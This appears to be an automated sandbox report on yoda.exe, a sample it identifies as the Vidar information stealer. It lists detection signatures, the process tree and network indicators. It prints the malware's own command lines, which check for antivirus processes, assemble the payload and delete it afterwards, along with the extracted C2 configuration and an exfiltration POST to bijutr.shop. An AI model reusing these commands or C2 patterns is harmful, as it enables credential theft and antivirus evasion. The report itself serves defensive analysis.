Windows Analysis Report
yoda.exe

Overview

General Information

Sample name: yoda.exe
Analysis ID: 1581176
MD5: 79884836c406ae143bc31aeadfa81e70
SHA1: 3a38f9b4cf9fc75a0b6ec34230e431e0c4b7c1a2
SHA256: 47d48f2753f7eab065480d9b125c1429a7943ed1fbb408e3076d7a3e3102bd0c
Tags: exe, Vidar, user-lontze7

Detection

Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Attempt to bypass Chrome Application-Bound Encryption
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Vidar stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Drops PE files with a suspicious file extension
Found API chain indicative of sandbox detection
Found many strings related to Crypto-Wallets (likely being stolen)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
OS version to string mapping found (often used in BOTs)
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Browser Started with Remote Debugging
Sigma detected: Suspicious Copy From or To System Directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • yoda.exe (PID: 7320 cmdline: "C:\Users\user\Desktop\yoda.exe" MD5: 79884836C406AE143BC31AEADFA81E70)
    • cmd.exe (PID: 7360 cmdline: "C:\Windows\System32\cmd.exe" /c copy Throat Throat.cmd & Throat.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 7448 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 7460 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 7500 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 7508 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 7544 cmdline: cmd /c md 314782 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • findstr.exe (PID: 7560 cmdline: findstr /V "INSPIRED" Interview MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 7576 cmdline: cmd /c copy /b ..\Qualifications + ..\Iso + ..\Processor + ..\Luther A MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Iceland.com (PID: 7592 cmdline: Iceland.com A MD5: 62D09F076E6E0240548C2F837536A46A)
        • chrome.exe (PID: 7980 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
          • chrome.exe (PID: 3844 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2588 --field-trial-handle=2176,i,7491124011227582456,6124971309095306324,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
        • cmd.exe (PID: 7392 cmdline: "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\314782\Iceland.com" & rd /s /q "C:\ProgramData\4EK6XL68GLNY" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 1188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • timeout.exe (PID: 5688 cmdline: timeout /t 10 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • choice.exe (PID: 7608 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • cleanup
{"C2 url": "https://steamcommunity.com/profiles/76561199809363512", "Botnet": "m0nk3"}
Source: sslproxydump.pcap, Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Author: Joe Security

Source: 0000000A.00000003.1950389528.0000000000E6B000.00000004.00000020.00020000.00000000.sdmp, Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Author: Joe Security
Source: 0000000A.00000002.2871233735.0000000003971000.00000040.00001000.00020000.00000000.sdmp, Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Author: Joe Security
Source: 0000000A.00000002.2868559733.0000000000ED3000.00000004.00000020.00020000.00000000.sdmp, Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Author: Joe Security
Source: 0000000A.00000003.1950013637.0000000003795000.00000004.00000800.00020000.00000000.sdmp, Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Author: Joe Security
Source: 0000000A.00000003.1949965283.0000000000E48000.00000004.00000020.00020000.00000000.sdmp, Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Author: Joe Security

Source: 10.2.Iceland.com.3970000.1.unpack, Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Author: Joe Security
Source: 10.2.Iceland.com.3970000.1.unpack, Rule: infostealer_win_vidar_strings_nov23, Description: Finds Vidar samples based on the specific strings, Author: Sekoia.io, Strings:
                • 0x2068c:$str01: MachineID:
                • 0x1f051:$str02: Work Dir: In memory
                • 0x206c3:$str03: [Hardware]
                • 0x20675:$str04: VideoCard:
                • 0x1fce5:$str05: [Processes]
                • 0x1fcf1:$str06: [Software]
                • 0x1f1bb:$str07: information.txt
                • 0x20398:$str08: %s\*
                • 0x203e5:$str08: %s\*
                • 0x1f5a2:$str11: Software\Martin Prikryl\WinSCP 2\Configuration
                • 0x1fb61:$str12: UseMasterPassword
                • 0x206cf:$str13: Soft: WinSCP
                • 0x2016e:$str14: <Pass encoding="base64">
                • 0x206b2:$str15: Soft: FileZilla
                • 0x1f1ad:$str16: passwords.txt
                • 0x1fb8c:$str17: build_id
                • 0x1fc80:$str18: file_data

                System Summary

                Source: Process started, Author: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: Iceland.com A, ParentImage: C:\Users\user\AppData\Local\Temp\314782\Iceland.com, ParentProcessId: 7592, ParentProcessName: Iceland.com, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", ProcessId: 7980, ProcessName: chrome.exe
                Source: Process started, Author: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c copy Throat Throat.cmd & Throat.cmd, CommandLine: "C:\Windows\System32\cmd.exe" /c copy Throat Throat.cmd & Throat.cmd, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\yoda.exe", ParentImage: C:\Users\user\Desktop\yoda.exe, ParentProcessId: 7320, ParentProcessName: yoda.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c copy Throat Throat.cmd & Throat.cmd, ProcessId: 7360, ProcessName: cmd.exe

                HIPS / PFW / Operating System Protection Evasion

                Source: Process started, Author: Joe Security: Data: Command: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c copy Throat Throat.cmd & Throat.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7360, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , ProcessId: 7508, ProcessName: findstr.exe

                Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                2024-12-27T07:09:38.030778+0100 | 2044247 | 1 | Malware Command and Control Activity Detected | 188.245.216.205 | 443 | 192.168.2.4 | 49743 | TCP
                2024-12-27T07:09:40.415459+0100 | 2051831 | 1 | Malware Command and Control Activity Detected | 188.245.216.205 | 443 | 192.168.2.4 | 49744 | TCP
                2024-12-27T07:09:35.450295+0100 | 2049087 | 1 | A Network Trojan was detected | 192.168.2.4 | 49742 | 188.245.216.205 | 443 | TCP
                2024-12-27T07:09:32.959230+0100 | 2859378 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49740 | 188.245.216.205 | 443 | TCP

                AV Detection

                Source: 0000000A.00000002.2868559733.0000000000ED3000.00000004.00000020.00020000.00000000.sdmp, Malware Configuration Extractor: Vidar {"C2 url": "https://steamcommunity.com/profiles/76561199809363512", "Botnet": "m0nk3"}
                Source: yoda.exe, Virustotal: Detection: 32%
                Source: yoda.exe, ReversingLabs: Detection: 55%
                Source: Submitted Sample, Integrated Neural Analysis Model: Matched 95.2% probability
                Source: yoda.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknown, HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:49735 version: TLS 1.2
                Source: unknown, HTTPS traffic detected: 188.245.216.205:443 -> 192.168.2.4:49738 version: TLS 1.2
                Source: yoda.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: cryptosetup.pdbGCTL source: Iceland.com, 0000000A.00000002.2872631842.0000000005F92000.00000004.00000800.00020000.00000000.sdmp, 2NG4E3.10.dr
                Source: Binary string: cryptosetup.pdb source: Iceland.com, 0000000A.00000002.2872631842.0000000005F92000.00000004.00000800.00020000.00000000.sdmp, 2NG4E3.10.dr
                Source: C:\Users\user\Desktop\yoda.exe, Code function: 0_2_00406301 FindFirstFileW,FindClose,0_2_00406301
                Source: C:\Users\user\Desktop\yoda.exe, Code function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406CC7
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com, Code function: 10_2_00A8DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,10_2_00A8DC54
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com, Code function: 10_2_00A9A087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_00A9A087
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com, Code function: 10_2_00A9A1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_00A9A1E2
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com, Code function: 10_2_00A8E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,10_2_00A8E472
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com, Code function: 10_2_00A9A570 FindFirstFileW,Sleep,FindNextFileW,FindClose,10_2_00A9A570
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com, Code function: 10_2_00A966DC FindFirstFileW,FindNextFileW,FindClose,10_2_00A966DC
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com, Code function: 10_2_00A5C622 FindFirstFileExW,10_2_00A5C622
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com, Code function: 10_2_00A973D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,10_2_00A973D4
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com, Code function: 10_2_00A97333 FindFirstFileW,FindClose,10_2_00A97333
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com, Code function: 10_2_00A8D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,10_2_00A8D921
                Source: C:\Windows\SysWOW64\cmd.exe, File opened: C:\Users\user\AppData\Local\Temp\314782
                Source: C:\Windows\SysWOW64\cmd.exe, File opened: C:\Users\user\AppData\Local\Temp\
                Source: C:\Windows\SysWOW64\cmd.exe, File opened: C:\Users\user\AppData\Local\
                Source: C:\Windows\SysWOW64\cmd.exe, File opened: C:\Users\user\AppData\Local\Temp\314782\
                Source: C:\Windows\SysWOW64\cmd.exe, File opened: C:\Users\user\AppData\
                Source: C:\Windows\SysWOW64\cmd.exe, File opened: C:\Users\user\
                Source: chrome.exe, Memory has grown: Private usage: 8MB later: 41MB

                Networking

                Source: Network traffic, Suricata IDS: 2859378 - Severity 1 - ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M2 : 192.168.2.4:49740 -> 188.245.216.205:443
                Source: Network traffic, Suricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M1 : 192.168.2.4:49742 -> 188.245.216.205:443
                Source: Network traffic, Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 188.245.216.205:443 -> 192.168.2.4:49744
                Source: Network traffic, Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 188.245.216.205:443 -> 192.168.2.4:49743
                Source: Malware configuration extractor, URLs: https://steamcommunity.com/profiles/76561199809363512
                Source: global traffic, HTTP traffic detected: GET /k04ael HTTP/1.1, Host: t.me, Connection: Keep-Alive, Cache-Control: no-cache
                Source: Joe Sandbox View, IP Address: 239.255.255.250
                Source: Joe Sandbox View, IP Address: 149.154.167.99
                Source: Joe Sandbox View, JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                Source: unknown, TCP traffic detected without corresponding DNS query: 173.222.162.32
                Source: unknown, TCP traffic detected without corresponding DNS query: 152.199.19.74
                Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com, Code function: 10_2_00A9D889 InternetReadFile,SetEvent,GetLastError,SetEvent,10_2_00A9D889
                Source: global traffic, HTTP traffic detected: GET / HTTP/1.1, User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0, Host: bijutr.shop, Connection: Keep-Alive, Cache-Control: no-cache
                Source: global traffic, HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1, Host: www.google.com, Connection: keep-alive, X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX, Sec-Fetch-Site: none, Sec-Fetch-Mode: no-cors, Sec-Fetch-Dest: empty, User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36, Accept-Encoding: gzip, deflate, br, Accept-Language: en-US,en;q=0.9
                Source: global traffic, HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1, Host: www.google.com, Connection: keep-alive, X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX, Sec-Fetch-Site: cross-site, Sec-Fetch-Mode: no-cors, Sec-Fetch-Dest: empty, User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36, Accept-Encoding: gzip, deflate, br, Accept-Language: en-US,en;q=0.9
                Source: global traffic, HTTP traffic detected: GET /async/newtab_promos HTTP/1.1, Host: www.google.com, Connection: keep-alive, Sec-Fetch-Site: cross-site, Sec-Fetch-Mode: no-cors, Sec-Fetch-Dest: empty, User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36, Accept-Encoding: gzip, deflate, br, Accept-Language: en-US,en;q=0.9
                Source: chrome.exe, 0000000F.00000002.2216489695.0000027800771000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: %https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
                Source: chrome.exe, 0000000F.00000002.2216489695.0000027800771000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: @https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
                Source: chrome.exe, 0000000F.00000002.2216489695.0000027800771000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://www.youtube.com/: equals www.youtube.com (Youtube)
                Source: chrome.exe, 0000000F.00000002.2216489695.0000027800771000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://www.youtube.com/J equals www.youtube.com (Youtube)
                Source: chrome.exe, 0000000F.00000002.2214811051.00000278002C0000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
                Source: global traffic, DNS traffic detected: DNS query: pXJlKZlafjPwNXLLYZe.pXJlKZlafjPwNXLLYZe
                Source: global traffic, DNS traffic detected: DNS query: t.me
                Source: global traffic, DNS traffic detected: DNS query: bijutr.shop
                Source: global traffic, DNS traffic detected: DNS query: www.google.com
                Source: unknown, HTTP traffic detected: POST / HTTP/1.1, Content-Type: multipart/form-data; boundary=----XT0RIWTJM7GV3E3OPZU3, User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0, Host: bijutr.shop, Content-Length: 255, Connection: Keep-Alive, Cache-Control: no-cache
                Source: chrome.exe, 0000000F.00000002.2217905171.0000027800B6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3502N
                Source: chrome.exe, 0000000F.00000003.2138022248.00000278003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2142012072.00000278007B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2141908830.00000278003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2217905171.0000027800B6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3577
                Source: chrome.exe, 0000000F.00000003.2138022248.00000278003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2142012072.00000278007B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2141908830.00000278003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2217905171.0000027800B6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3584
                Source: chrome.exe, 0000000F.00000003.2138022248.00000278003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2142012072.00000278007B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2141908830.00000278003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2217905171.0000027800B6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3586
                Source: chrome.exe, 0000000F.00000002.2217905171.0000027800B6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3586;
                Source: chrome.exe, 0000000F.00000003.2141908830.00000278003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2218115098.0000027800BE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3623
                Source: chrome.exe, 0000000F.00000003.2141908830.00000278003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2218115098.0000027800BE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3624
                Source: chrome.exe, 0000000F.00000003.2141908830.00000278003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2218115098.0000027800BE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3625
                Source: chrome.exe, 0000000F.00000003.2138022248.00000278003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2142012072.00000278007B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2141908830.00000278003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2217905171.0000027800B6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3832
                Source: chrome.exe, 0000000F.00000003.2138022248.00000278003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2142012072.00000278007B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2141908830.00000278003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2217905171.0000027800B6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3862
                Source: chrome.exe, 0000000F.00000003.2138022248.00000278003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2142012072.00000278007B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2141908830.00000278003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2217905171.0000027800B6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3965
                Source: chrome.exe, 0000000F.00000003.2138022248.00000278003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2142012072.00000278007B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2141908830.00000278003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2217905171.0000027800B6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3970
                Source: chrome.exe, 0000000F.00000003.2138022248.00000278003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2142012072.00000278007B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2141908830.00000278003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2217905171.0000027800B6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4324
                Source: chrome.exe, 0000000F.00000003.2138022248.00000278003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2142012072.00000278007B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2141908830.00000278003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2217905171.0000027800B6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4384
                Source: chrome.exe, 0000000F.00000003.2138022248.00000278003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2142012072.00000278007B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2141908830.00000278003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2217905171.0000027800B6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4405
                Source: chrome.exe, 0000000F.00000003.2138022248.00000278003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2142012072.00000278007B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2141908830.00000278003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2217905171.0000027800B6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4428
                Source: chrome.exe, 0000000F.00000003.2138022248.00000278003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2142012072.00000278007B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2141908830.00000278003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2217905171.0000027800B6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4551
                Source: chrome.exe, 0000000F.00000003.2138022248.00000278003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2142012072.00000278007B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2141908830.00000278003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2217905171.0000027800B6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4633
                Source: chrome.exe, 0000000F.00000003.2138022248.00000278003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2142012072.00000278007B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2141908830.00000278003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2217905171.0000027800B6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4722
                Source: chrome.exe, 0000000F.00000002.2217905171.0000027800B6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4722S
                Source: chrome.exe, 0000000F.00000003.2138022248.00000278003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2142012072.00000278007B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2141908830.00000278003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2217905171.0000027800B6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4836
                Source: chrome.exe, 0000000F.00000003.2138022248.00000278003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2142012072.00000278007B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2141908830.00000278003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2217905171.0000027800B6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4901
                Source: chrome.exe, 0000000F.00000002.2217905171.0000027800B6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4901)
